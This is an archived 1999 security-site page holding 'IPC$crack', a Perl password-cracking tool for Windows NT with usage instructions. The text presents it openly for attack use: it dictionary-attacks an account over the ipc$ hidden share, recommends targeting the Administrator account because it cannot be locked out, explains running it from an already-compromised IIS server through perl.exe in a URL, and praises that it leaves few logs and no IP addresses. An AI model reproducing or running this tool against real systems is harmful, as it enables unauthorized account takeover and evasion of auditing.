what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ipccrack.htm

ipccrack.htm
Posted Aug 17, 1999

Document on IPC password cracking.

SHA-256 | 8af75d1da9fba20452d628379437b850a2d02b77b6cc97010e540013ac501d45

ipccrack.htm

Change Mirror Download
<HTML>
<HEAD>
<TITLE>IPC$crack</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">

<B><P ALIGN="CENTER">IPC$crack</P>
<P ALIGN="CENTER">&nbsp;</P>
</B><P>IPC$crack attempts to crack a user's password using a dictionary attack by connecting to the ipc$ hidden share on a NT machine and trying passwords read from a text file. I advise you to try the Adminstrator account because this can't be locked out

. IPC$crack takes two command line parameters, namely the target machine and the account you want to crack. It can also be run remotely. If you have cracked an NT Internet Information Server upload ipc$crack.pl, perl.exe, a text file called net.txt (can c

ontain anything) and that passwd.txt file to the \inetpub\scripts directory. To run it enter the following in your browser :</P>
<P>&nbsp;</P>
<P>http://www.here.com/scripts/perl.exe?c:/inetpub/scripts/ipc$crack.pl%20target%20account</P>
<P>&nbsp;</P>
<P>where "target" is the machine eg www.microsoft.com and "account" is the UserID that you're trying to crack eg Administrator. Here it is :</P>
<P>&nbsp;</P>
<P>************************** CUT ********************************</P>
<P>&nbsp;</P>
<P>#</P>
<P># IPC$crack</P>
<P># Created by Mnemonix 1st of May 1998</P>
<P>#</P>
<P>&nbsp;</P>
<P>&nbsp;</P>
<P>$victim = $ARGV[0]; </P>
<P>&nbsp;</P>
<P>$user = $ARGV[1];</P>
<P>&nbsp;</P>
<P>open (OUTPUT, ">e:/inetpub/scripts/net.txt");</P>
<P>&nbsp;</P>
<P>open (PASSWORD, "e:/inetpub/scripts/passwd.txt");</P>
<P>&nbsp;</P>
<P>$passwd = <PASSWORD>;</P>
<P>&nbsp;</P>
<P>while ($passwd ne "")</P>
<P>&nbsp;</P>
<P>{</P>
<P>&nbsp;</P>
<P> chop ($passwd);</P>
<P> </P>
<P> $line = system ("net use \\\\$victim\\ipc\$ $passwd /user:$user");</P>
<P> </P>
<P> if ($line eq "0")</P>
<P> </P>
<P> { </P>
<P> </P>
<P> print OUTPUT ("$user\'s password on $victim is $passwd.");</P>
<P> </P>
<P> $passwd="";</P>
<P>&nbsp;</P>
<P> }</P>
<P> </P>
<P> else</P>
<P>&nbsp;</P>
<P> {</P>
<P>&nbsp;</P>
<P> $passwd = <PASSWORD>;</P>
<P>&nbsp;</P>
<P> if ($passwd eq "")</P>
<P>&nbsp;</P>
<P> {</P>
<P> </P>
<P> print OUTPUT ("Not cracked.");</P>
<P>&nbsp;</P>
<P> }</P>
<P>&nbsp;</P>
<P> }</P>
<P>&nbsp;</P>
<P>}</P>
<P>&nbsp;</P>
<P>********************************** CUT *********************************</P>
<P>&nbsp;</P>
<P>If the password is cracked it will be written to the file net.txt. If not then you'll get a message saying not cracked. IPC$crack is slower than Ftpcrack but there are less logs generated if any at all. More importantly if auditing <I>is</I> enabled,

no IP addresses are logged.</P>
<P>&nbsp;</P>
<P>Note - net.txt and passwd.txt must be in the location (path) specified by the script. You can edit the script to suit your own needs.
</P></BODY>
</HTML>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close